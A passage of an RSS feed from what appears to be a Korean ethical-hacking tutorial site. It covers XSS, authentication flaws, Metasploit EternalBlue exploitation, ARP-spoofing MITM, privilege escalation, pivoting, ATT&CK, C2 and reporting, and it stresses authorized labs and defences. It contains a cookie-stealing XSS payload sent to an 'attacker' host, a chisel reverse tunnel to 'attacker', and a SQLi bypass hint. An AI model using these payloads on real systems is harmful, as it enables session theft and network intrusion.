&amp;lt;script&amp;gt;fetch(&amp;#39;https://attacker/c?&amp;#39;&amp;#43;document.cookie)&amp;lt;/script&amp;gt;
&amp;lt;img src=x onerror=&amp;#34;alert(document.domain)&amp;#34;&amp;gt;&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;p&gt;&lt;strong&gt;방어&lt;/strong&gt;: 출력 인코딩(컨텍스트별), 입력 검증, &lt;strong&gt;CSP(Content-Security-Policy)&lt;/strong&gt;,
쿠키에 &lt;code&gt;HttpOnly&lt;/code&gt;·&lt;code&gt;Secure&lt;/code&gt; 플래그.&lt;/p&gt;</description></item><item><title>인증과 세션 관리</title><link>https://whacker.metacog.co.kr/docs/web/authentication-sessions/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/web/authentication-sessions/</guid><description>&lt;p&gt;인증(누구인가)과 세션(로그인 상태 유지), 인가(무엇을 할 수 있나)의 결함은
전체 계정 탈취로 이어진다. OWASP A01·A07에 해당한다.&lt;/p&gt;
&lt;h2 id="flaws"&gt;흔한 결함 &lt;a href="#flaws" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;결함&lt;/th&gt;
 &lt;th&gt;공격&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;약한 비밀번호 정책&lt;/td&gt;
 &lt;td&gt;사전·무차별 대입(hydra, medusa)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;계정 열거&lt;/td&gt;
 &lt;td&gt;로그인 실패 메시지 차이로 유효 ID 판별&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;자격증명 스터핑&lt;/td&gt;
 &lt;td&gt;유출된 ID/PW 재사용&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;취약한 세션 토큰&lt;/td&gt;
 &lt;td&gt;예측 가능·미만료 세션&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;MFA 부재&lt;/td&gt;
 &lt;td&gt;비밀번호만으로 침입&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="idor"&gt;IDOR / 접근통제 우회 &lt;a href="#idor" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;**IDOR(Insecure Direct Object Reference)**는 A01의 대표 사례다. 요청의 식별자만
바꿔 남의 리소스에 접근한다.&lt;/p&gt;</description></item><item><title>네트워크 서비스 공격</title><link>https://whacker.metacog.co.kr/docs/network/network-attacks/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/network/network-attacks/</guid><description>&lt;p&gt;스캐닝으로 찾은 서비스에서 취약점을 확인하고 익스플로잇해 최초 발판(foothold)을
확보한다. 모든 실습은 Metasploitable2 등 인가된 취약 VM에서 한다.&lt;/p&gt;
&lt;h2 id="foothold"&gt;발판 확보 흐름 &lt;a href="#foothold" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart LR
 E[서비스·버전 확인] --&amp;gt; S[알려진 CVE 검색&amp;lt;br/&amp;gt;searchsploit]
 S --&amp;gt; M{공개 익스플로잇?}
 M --&amp;gt;|예| X[익스플로잇 실행]
 M --&amp;gt;|아니오| C[기본 자격증명·설정오류]
 X --&amp;gt; F[셸 획득]
 C --&amp;gt; F
&lt;/pre&gt;
&lt;h2 id="search"&gt;취약점 검색 &lt;a href="#search" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;


 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="dec3025" class="language-bash "&gt;
 &lt;code&gt;# 로컬 Exploit-DB 검색
searchsploit vsftpd 2.3.4
searchsploit --cve 2017-0144 # EternalBlue

# 서비스 버전으로 매칭
nmap --script vuln 10.10.10.5&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;h2 id="msf"&gt;Metasploit 기본 &lt;a href="#msf" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;


 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="e354456" class="language-bash "&gt;
 &lt;code&gt;msfconsole -q
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.5
set LHOST 10.10.10.2
run&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;p&gt;Metasploit은 강력하지만 &lt;strong&gt;원리를 먼저 이해&lt;/strong&gt;한다. 수동 익스플로잇을 병행해
페이로드·리스너·셸의 동작을 몸에 익힌다.&lt;/p&gt;</description></item><item><title>스니핑과 무선</title><link>https://whacker.metacog.co.kr/docs/network/sniffing-wireless/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/network/sniffing-wireless/</guid><description>&lt;p&gt;같은 네트워크 세그먼트에서는 트래픽을 관찰·조작할 수 있다. 무선은 물리 매체가
공유되므로 특히 취약하다. &lt;strong&gt;반드시 본인 소유·인가된 네트워크에서만&lt;/strong&gt; 실습한다.&lt;/p&gt;
&lt;h2 id="sniffing"&gt;패킷 스니핑 &lt;a href="#sniffing" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Wireshark&lt;/strong&gt; — 패킷 캡처·분석. 평문 프로토콜(HTTP, FTP, Telnet)에서 자격증명 관찰.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;tcpdump&lt;/strong&gt; — CLI 캡처.&lt;/li&gt;
&lt;/ul&gt;



 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="daadb16" class="language-bash "&gt;
 &lt;code&gt;sudo tcpdump -i eth0 -w capture.pcap port 80&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;h2 id="mitm"&gt;중간자 공격(MITM) &lt;a href="#mitm" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;sequenceDiagram
 participant V as 피해자
 participant A as 공격자(MITM)
 participant G as 게이트웨이
 A-&amp;gt;&amp;gt;V: ARP 스푸핑(&amp;#34;내가 게이트웨이&amp;#34;)
 A-&amp;gt;&amp;gt;G: ARP 스푸핑(&amp;#34;내가 피해자&amp;#34;)
 V-&amp;gt;&amp;gt;A: 트래픽 전송
 A-&amp;gt;&amp;gt;G: 중계(관찰·변조 가능)
&lt;/pre&gt;
&lt;p&gt;ARP 스푸핑으로 트래픽을 자신을 거치게 만든다. &lt;strong&gt;방어&lt;/strong&gt;: 동적 ARP 검사(DAI),
HTTPS/HSTS(평문 노출 방지), 포트 보안.&lt;/p&gt;</description></item><item><title>권한 상승</title><link>https://whacker.metacog.co.kr/docs/system/privilege-escalation/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/system/privilege-escalation/</guid><description>&lt;p&gt;권한 상승(privilege escalation)은 제한된 계정에서 관리자 권한을 획득하는 과정이다.
핵심은 &lt;strong&gt;열거&lt;/strong&gt;다 — 시스템을 샅샅이 조사해 잘못된 설정을 찾는다.&lt;/p&gt;
&lt;h2 id="principle"&gt;공통 원리 &lt;a href="#principle" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart TD
 A[낮은 권한 셸] --&amp;gt; B[자동·수동 열거]
 B --&amp;gt; C{취약 벡터?}
 C --&amp;gt; D[설정 오류&amp;lt;br/&amp;gt;SUID·권한·크론]
 C --&amp;gt; E[취약 커널·서비스]
 C --&amp;gt; F[평문 자격증명·재사용]
 D --&amp;gt; G[root/SYSTEM]
 E --&amp;gt; G
 F --&amp;gt; G
&lt;/pre&gt;
&lt;h2 id="linux"&gt;Linux 권한상승 &lt;a href="#linux" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;벡터&lt;/th&gt;
 &lt;th&gt;확인&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;sudo 오설정&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;sudo -l&lt;/code&gt; → &lt;a href="https://gtfobins.github.io" rel="external" target="_blank"&gt;GTFOBins&lt;svg width="16" height="16" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"&gt;&lt;path fill="currentColor" d="M14 5c-.552 0-1-.448-1-1s.448-1 1-1h6c.552 0 1 .448 1 1v6c0 .552-.448 1-1 1s-1-.448-1-1v-3.586l-7.293 7.293c-.391.39-1.024.39-1.414 0-.391-.391-.391-1.024 0-1.414l7.293-7.293h-3.586zm-9 2c-.552 0-1 .448-1 1v11c0 .552.448 1 1 1h11c.552 0 1-.448 1-1v-4.563c0-.552.448-1 1-1s1 .448 1 1v4.563c0 1.657-1.343 3-3 3h-11c-1.657 0-3-1.343-3-3v-11c0-1.657 1.343-3 3-3h4.563c.552 0 1 .448 1 1s-.448 1-1 1h-4.563z"/&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SUID 바이너리&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;find / -perm -4000 2&amp;gt;/dev/null&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;쓰기 가능 크론·경로&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;/etc/crontab&lt;/code&gt;, PATH 하이재킹&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;취약 커널&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;uname -a&lt;/code&gt; → 알려진 exploit&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;자격증명 노출&lt;/td&gt;
 &lt;td&gt;설정파일·히스토리·&lt;code&gt;.env&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;자동 열거: &lt;strong&gt;linpeas.sh&lt;/strong&gt;, LinEnum.&lt;/p&gt;</description></item><item><title>지속성과 측면 이동</title><link>https://whacker.metacog.co.kr/docs/system/persistence-lateral/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/system/persistence-lateral/</guid><description>&lt;p&gt;권한을 얻은 뒤 레드팀은 접근을 유지(persistence)하고, 목표를 향해 다른
호스트로 이동(lateral movement)한다. 이는 실제 공격자의 행동을 모사해
탐지·대응 역량을 평가하기 위함이며, &lt;strong&gt;인가된 범위에서만&lt;/strong&gt; 수행한다.&lt;/p&gt;
&lt;h2 id="lateral"&gt;측면 이동 개념 &lt;a href="#lateral" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart LR
 A[침해된 호스트 1] --&amp;gt;|수집한 자격증명| B[피벗]
 B --&amp;gt; C[호스트 2]
 C --&amp;gt; D[도메인 컨트롤러/목표]
 A -. 크리덴셜 덤프 .-&amp;gt; B
&lt;/pre&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;기법&lt;/th&gt;
 &lt;th&gt;설명&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Pass-the-Hash&lt;/td&gt;
 &lt;td&gt;NTLM 해시로 인증(비밀번호 불필요)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Pass-the-Ticket&lt;/td&gt;
 &lt;td&gt;Kerberos 티켓 재사용&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;크리덴셜 덤프&lt;/td&gt;
 &lt;td&gt;mimikatz, LSASS 메모리&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;원격 실행&lt;/td&gt;
 &lt;td&gt;psexec, WinRM, WMI, SSH&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;피벗팅/터널링&lt;/td&gt;
 &lt;td&gt;chisel, ssh -L, proxychains&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="pivot"&gt;피벗팅 예시 &lt;a href="#pivot" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;


 
 
 

 
 
 
 

 

 &lt;div class="prism-codeblock "&gt;
 &lt;pre id="e8c183e" class="language-bash "&gt;
 &lt;code&gt;# 침해 호스트를 경유해 내부망 접근 (chisel 리버스 터널)
# 공격자
./chisel server -p 8000 --reverse
# 침해 호스트
./chisel client attacker:8000 R:socks
# proxychains로 내부망 스캔
proxychains nmap -sT 10.10.20.0/24&lt;/code&gt;
 &lt;/pre&gt;
 &lt;/div&gt;
&lt;h2 id="ad"&gt;Active Directory &lt;a href="#ad" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;기업 환경 대부분이 AD를 쓴다. 핵심 공격: Kerberoasting, AS-REP Roasting,
ACL 남용, DCSync. 도구: &lt;strong&gt;BloodHound&lt;/strong&gt;(공격 경로 시각화), Rubeus, Impacket.&lt;/p&gt;</description></item><item><title>적대적 에뮬레이션 &amp; MITRE ATT&amp;CK</title><link>https://whacker.metacog.co.kr/docs/redteam/attack-emulation/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/redteam/attack-emulation/</guid><description>&lt;p&gt;레드팀 vs 펜테스트의 차이는 &lt;strong&gt;목표&lt;/strong&gt;다. 펜테스트는 최대한 많은 취약점을 찾고,
레드팀은 특정 목표(예: 도메인 관리자·특정 데이터)를 향해 &lt;strong&gt;실제 공격자처럼&lt;/strong&gt;
은밀하게 움직이며 방어팀(블루팀)의 탐지 역량을 시험한다.&lt;/p&gt;
&lt;h2 id="attack"&gt;MITRE ATT&amp;amp;CK &lt;a href="#attack" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;ATT&amp;amp;CK은 공격자의 전술(Tactic, &amp;ldquo;왜&amp;rdquo;)과 기법(Technique, &amp;ldquo;어떻게&amp;rdquo;)을 정리한
지식베이스다. 레드팀은 작전을 ATT&amp;amp;CK 기법에 매핑해 커버리지와 탐지를 측정한다.&lt;/p&gt;
&lt;pre class="mermaid"&gt;flowchart LR
 R[정찰] --&amp;gt; I[초기 침투]
 I --&amp;gt; E[실행]
 E --&amp;gt; P[지속성]
 P --&amp;gt; PE[권한상승]
 PE --&amp;gt; D[방어 회피]
 D --&amp;gt; C[크리덴셜 접근]
 C --&amp;gt; L[측면이동]
 L --&amp;gt; Ex[유출/영향]
&lt;/pre&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;전술(예)&lt;/th&gt;
 &lt;th&gt;기법 예시&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Initial Access&lt;/td&gt;
 &lt;td&gt;스피어피싱(T1566)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Execution&lt;/td&gt;
 &lt;td&gt;파워셸(T1059.001)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Persistence&lt;/td&gt;
 &lt;td&gt;스케줄 작업(T1053)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Defense Evasion&lt;/td&gt;
 &lt;td&gt;난독화·서명(T1027)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Credential Access&lt;/td&gt;
 &lt;td&gt;LSASS 덤프(T1003)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Lateral Movement&lt;/td&gt;
 &lt;td&gt;Pass-the-Hash(T1550.002)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="plan"&gt;에뮬레이션 계획 &lt;a href="#plan" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;위협 선정&lt;/strong&gt; — 조직이 실제로 마주할 행위자(APT 그룹 등)를 정한다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TTP 추출&lt;/strong&gt; — 해당 그룹의 알려진 기법을 ATT&amp;amp;CK에서 뽑는다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;시나리오 실행&lt;/strong&gt; — 초기 침투부터 목표까지 체인으로 수행한다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;탐지 측정&lt;/strong&gt; — 각 단계에서 블루팀이 탐지·차단했는지 기록한다.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="purple"&gt;Purple Team &lt;a href="#purple" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;레드팀 실행과 블루팀 탐지를 &lt;strong&gt;협업&lt;/strong&gt;으로 진행하면(퍼플팀) 탐지 규칙을 즉시
개선할 수 있다. Atomic Red Team, Caldera로 개별 기법을 재현·검증한다.&lt;/p&gt;</description></item><item><title>C2와 소셜 엔지니어링</title><link>https://whacker.metacog.co.kr/docs/redteam/c2-social-engineering/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/redteam/c2-social-engineering/</guid><description>&lt;p&gt;대부분의 실제 침해는 기술 취약점이 아니라 &lt;strong&gt;사람&lt;/strong&gt;에서 시작한다. 레드팀은
소셜 엔지니어링으로 초기 발판을 얻고, **C2(Command &amp;amp; Control)**로 침해 자산을 운용한다.&lt;/p&gt;
&lt;h2 id="se"&gt;소셜 엔지니어링 &lt;a href="#se" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;기법&lt;/th&gt;
 &lt;th&gt;설명&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;피싱/스피어피싱&lt;/td&gt;
 &lt;td&gt;표적화된 악성 이메일&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;프리텍스팅&lt;/td&gt;
 &lt;td&gt;신뢰할 만한 상황·정체 위장&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;베이팅&lt;/td&gt;
 &lt;td&gt;USB·미끼로 실행 유도&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Vishing&lt;/td&gt;
 &lt;td&gt;전화로 정보·행동 유도&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;RoE 필수&lt;/strong&gt;: 소셜 엔지니어링은 직원 대상 실험이므로 반드시 사전 승인·범위·
심리적 안전장치를 명시한다. 실제 개인 피해를 주지 않는다.&lt;/p&gt;
&lt;h2 id="c2"&gt;C2 개념 &lt;a href="#c2" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart LR
 O[오퍼레이터] --&amp;gt; T[C2 서버]
 T &amp;lt;-.비콘.-&amp;gt; A[에이전트/임플란트&amp;lt;br/&amp;gt;침해된 호스트]
 T &amp;lt;-.비콘.-&amp;gt; B[에이전트 2]
 style T fill:#511
&lt;/pre&gt;
&lt;p&gt;C2는 침해 호스트의 **에이전트(임플란트)**와 오퍼레이터를 잇는다. 에이전트는
주기적으로 서버에 접속(beacon)해 명령을 받고 결과를 반환한다.&lt;/p&gt;</description></item><item><title>보고서 작성</title><link>https://whacker.metacog.co.kr/docs/redteam/reporting/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/redteam/reporting/</guid><description>&lt;p&gt;보고서 없는 침투 테스트는 무의미하다. 고객이 돈을 내는 것은 셸이 아니라
&lt;strong&gt;우선순위가 매겨진, 실행 가능한 방어 계획&lt;/strong&gt;이다. 실력 있는 해커와 뛰어난
컨설턴트를 가르는 지점이 여기다.&lt;/p&gt;
&lt;h2 id="structure"&gt;구성 &lt;a href="#structure" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;섹션&lt;/th&gt;
 &lt;th&gt;대상 독자&lt;/th&gt;
 &lt;th&gt;내용&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Executive Summary&lt;/td&gt;
 &lt;td&gt;경영진&lt;/td&gt;
 &lt;td&gt;비즈니스 위험, 전반 평가(기술용어 최소)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;범위·방법론&lt;/td&gt;
 &lt;td&gt;관리자&lt;/td&gt;
 &lt;td&gt;RoE, 테스트 기간·대상·기법&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;발견 사항&lt;/td&gt;
 &lt;td&gt;엔지니어&lt;/td&gt;
 &lt;td&gt;취약점별 상세&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;부록&lt;/td&gt;
 &lt;td&gt;엔지니어&lt;/td&gt;
 &lt;td&gt;로그·페이로드·ATT&amp;amp;CK 매핑&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="finding"&gt;발견 사항 항목 &lt;a href="#finding" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;각 취약점은 다음을 포함한다:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;제목·심각도&lt;/strong&gt; — CVSS 점수와 위험 등급.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;설명&lt;/strong&gt; — 무엇이 왜 취약한가.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;영향(Impact)&lt;/strong&gt; — 악용 시 비즈니스 관점 결과.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;재현 절차(PoC)&lt;/strong&gt; — 스크린샷·명령어로 단계별.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;개선 방안(Remediation)&lt;/strong&gt; — 구체적·실행 가능한 수정.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="risk"&gt;위험 등급 &lt;a href="#risk" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;quadrantChart
 title 위험 우선순위
 x-axis 낮은 발생가능성 --&amp;gt; 높은 발생가능성
 y-axis 낮은 영향 --&amp;gt; 높은 영향
 quadrant-1 즉시 조치
 quadrant-2 계획 수립
 quadrant-3 수용/모니터
 quadrant-4 빠른 조치
&lt;/pre&gt;
&lt;h2 id="principles"&gt;좋은 보고서의 원칙 &lt;a href="#principles" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;재현 가능해야&lt;/strong&gt; 한다 — 개발자가 그대로 따라 확인할 수 있어야 한다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;비난이 아니라 해결&lt;/strong&gt;에 초점. 조직을 돕는 문서다.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;우선순위&lt;/strong&gt;를 명확히 — 무엇을 먼저 고쳐야 하는지.&lt;/li&gt;
&lt;li&gt;심각한 발견은 테스트 중이라도 &lt;strong&gt;즉시 구두 보고&lt;/strong&gt;한다(RoE의 비상 연락).&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;blockquote&gt;
&lt;p&gt;🧪 &lt;strong&gt;실습해 보기&lt;/strong&gt;: &lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/labs/ctf-comprehensive/'&gt;&lt;p&gt;실습 예제 문제&lt;/p&gt;</description></item><item><title>웹 해킹 실습 문제</title><link>https://whacker.metacog.co.kr/docs/labs/web-challenges/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/labs/web-challenges/</guid><description>&lt;p&gt;&lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/web/'&gt;&lt;p&gt;개요&lt;/p&gt;&lt;strong&gt;웹 애플리케이션 해킹&lt;/strong&gt;&lt;br&gt;OWASP Top 10을 중심으로 한 웹 취약점 발견과 방어.&lt;/a&gt;" data-bs-toggle="tooltip" href="https://whacker.metacog.co.kr/docs/web/"&gt;웹 애플리케이션 해킹&lt;/a&gt; 영역과 짝을 이루는 실습이다. &lt;strong&gt;OWASP Juice
Shop&lt;/strong&gt; 또는 &lt;strong&gt;DVWA&lt;/strong&gt;를 &lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/getting-started/build-a-lab/'&gt;&lt;p&gt;시작하기&lt;/p&gt;&lt;strong&gt;실습 랩 구축&lt;/strong&gt;&lt;br&gt;격리된 가상 환경에서 안전하게 연습하기 위한 홈랩 설계.&lt;/a&gt;" data-bs-toggle="tooltip" href="https://whacker.metacog.co.kr/docs/getting-started/build-a-lab/"&gt;실습 랩&lt;/a&gt;에 띄우고 진행한다.&lt;/p&gt;
&lt;h2 id="c1-sqli"&gt;문제 1 — 로그인 우회 (SQLi) 🟢 &lt;a href="#c1-sqli" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;목표&lt;/strong&gt;: DVWA(Low) 또는 Juice Shop 로그인 폼에서 SQL 인젝션으로 관리자 계정에
비밀번호 없이 로그인한다.&lt;/p&gt;
&lt;details&gt;&lt;summary&gt;💡 힌트&lt;/summary&gt;
&lt;ul&gt;
&lt;li&gt;입력이 쿼리 문자열에 그대로 붙는다면, 주석(&lt;code&gt;--&lt;/code&gt;)으로 뒷부분을 잘라낼 수 있다.&lt;/li&gt;
&lt;li&gt;이메일 필드에 &lt;code&gt;' OR 1=1--&lt;/code&gt; 형태를 시도해 본다.&lt;/li&gt;
&lt;li&gt;참고: &lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/web/injection-sqli/'&gt;&lt;p&gt;웹 애플리케이션 해킹&lt;/p&gt;</description></item><item><title>네트워크·시스템 실습 문제</title><link>https://whacker.metacog.co.kr/docs/labs/network-system-challenges/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/labs/network-system-challenges/</guid><description>&lt;p&gt;&lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/recon/'&gt;&lt;p&gt;개요&lt;/p&gt;&lt;strong&gt;정찰&lt;/strong&gt;&lt;br&gt;OSINT와 스캐닝·열거 — 공격 표면을 그리는 